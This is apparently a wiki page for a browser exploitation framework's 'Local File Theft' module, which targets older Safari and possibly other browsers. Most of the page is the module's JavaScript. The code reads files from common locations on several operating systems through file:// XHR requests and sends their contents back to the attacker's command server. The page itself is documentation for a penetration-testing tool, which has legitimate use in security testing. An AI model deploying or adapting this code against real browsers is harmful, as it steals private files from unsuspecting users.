-
Notifications
You must be signed in to change notification settings - Fork 2.1k
Module: Local File Theft
Haoxi Tan edited this page Jan 7, 2020
·
2 revisions
-
Objective: Steals local files in common locations across Android, iOS, OSX and Windows
-
Authors: mh
-
Browsers: Safari (< 10) and potentially others
Uses the file:// scheme to steal files with XMLHttpRequest (XHR).
function grabFiles(dir,os){
tmpfile = {}
for (i in fileList[os]['post']){
beef.debug('dir = ' + dir);
beef.debug('fileList: ' + fileList[os]['post'][i]);
beef.debug(i);
tmpfile[i] = new XMLHttpRequest()
tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]);
tmpfile[i].send();
tmpfile[i].onreadystatechange=function(){
for (j in fileList[os]['post']) {
if(tmpfile[j].readyState==4) {
beef.debug('new returned for: ' + j);
result = j +": "+ tmpfile[j].responseText;
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);
}
}
}
}
}- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK